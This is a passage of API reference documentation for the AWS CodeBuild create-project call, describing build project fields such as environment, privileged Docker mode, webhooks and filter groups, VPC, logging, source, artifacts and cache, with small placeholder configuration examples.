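        {'name': 'STAGE', 'value': 'prod', 'type': 'PLAINTEXT'},
        # the value is the Systems Manager parameter name, not the secret itself
        {'name': 'DB_PASSWORD', 'value': '/myapp/prod/db-password', 'type': 'PARAMETER_STORE'}
    ]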
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c "until docker info; do echo .; sleep 1; done"``
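Putting this together, a sketch of a privileged Linux environment for Docker builds (the image name is an assumption, not prescribed by this API) might be::

    environment = {
        'type': 'LINUX_CONTAINER',
        'image': 'aws/codebuild/standard:2.0',  # placeholder curated image
        'computeType': 'BUILD_GENERAL1_SMALL',
        'privilegedMode': True                  # required to run the Docker daemon
    }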
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
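For instance, pulling a private registry image requires pairing ``SERVICE_ROLE`` credentials with a ``registryCredential`` (the registry and secret ARN below are placeholders)::

    environment = {
        'type': 'LINUX_CONTAINER',
        'image': 'registry.example.com/team/builder:latest',  # private image
        'computeType': 'BUILD_GENERAL1_SMALL',
        'imagePullCredentialsType': 'SERVICE_ROLE',           # required for private registries
        'registryCredential': {
            'credential': 'arn:aws:secretsmanager:us-east-1:123456789012:secret:registry-creds',
            'credentialProvider': 'SECRETS_MANAGER'
        }
    }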
- **serviceRole** *(string) --*
The ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait before timing out any related build that did not get marked as completed. The default is 60 minutes.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
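Either form is a plain string; for example (placeholder values)::

    encryptionKey = 'arn:aws:kms:us-east-1:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab'
    # or, if an alias exists for the CMK:
    encryptionKey = 'alias/my-build-key'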
- **tags** *(list) --*
The tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag's key.
- **value** *(string) --*
The tag's value.
- **created** *(datetime) --*
When the build project was created, expressed in Unix time format.
- **lastModified** *(datetime) --*
When the build project's settings were last modified, expressed in Unix time format.
- **webhook** *(dict) --*
Information about a webhook that connects repository events to a build project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` event type works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
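As an illustration of these semantics, a single filter group that builds pushes to ``master`` while skipping documentation-only changes (the patterns are examples, not defaults) could be::

    filterGroups = [
        [   # every filter in a group must pass; separate groups are OR'ed
            {'type': 'EVENT', 'pattern': 'PUSH'},
            {'type': 'HEAD_REF', 'pattern': '^refs/heads/master$'},
            {'type': 'FILE_PATH', 'pattern': '^docs/', 'excludeMatchedPattern': True}
        ]
    ]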
- **vpcConfig** *(dict) --*
Information about the VPC configuration that AWS CodeBuild accesses.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
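For example (the IDs below are placeholders)::

    vpcConfig = {
        'vpcId': 'vpc-0123456789abcdef0',
        'subnets': ['subnet-0123456789abcdef0', 'subnet-0fedcba9876543210'],
        'securityGroupIds': ['sg-0123456789abcdef0']
    }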
- **badge** *(dict) --*
Information about the build badge for the build project.
- **badgeEnabled** *(boolean) --*
Set this to true to generate a publicly accessible URL for your project's build badge.
- **badgeRequestUrl** *(string) --*
The publicly accessible URL through which you can access the build badge for your project.
- **logsConfig** *(dict) --*
Information about logs for the build project. A project can create logs in Amazon CloudWatch Logs, an S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
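Combining both destinations, a sketch of a ``logsConfig`` value (group, stream, and bucket names are placeholders)::

    logsConfig = {
        'cloudWatchLogs': {
            'status': 'ENABLED',
            'groupName': 'my-build-logs',       # CloudWatch Logs group
            'streamName': 'my-project'          # stream name prefix
        },
        's3Logs': {
            'status': 'ENABLED',
            'location': 'my-bucket/build-log',  # bucket/prefix, as described above
            'encryptionDisabled': False
        }
    }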
:type name: string
:param name: **[REQUIRED]**
The name of the build project.
:type description: string
:param description:
A description that makes the build project easy to identify.
:type source: dict
:param source: **[REQUIRED]**
Information about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
:type secondarySources: list
:param secondarySources:
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
:type artifacts: dict
:param artifacts: **[REQUIRED]**
Information about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type secondaryArtifacts: list
:param secondaryArtifacts:
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type cache: dict
:param cache:
Stores recently used information so that it can be quickly accessed at a later time.
- **type** *(string) --* **[REQUIRED]**
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux environment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to either of the other two local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overridden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
:type environment: dict
:param environment: **[REQUIRED]**
Information about the build environment for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build environment to use for related builds.
- **image** *(string) --* **[REQUIRED]**
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --* **[REQUIRED]**
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --* **[REQUIRED]**
The name or key of the environment variable.
- **value** *(string) --* **[REQUIRED]**
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
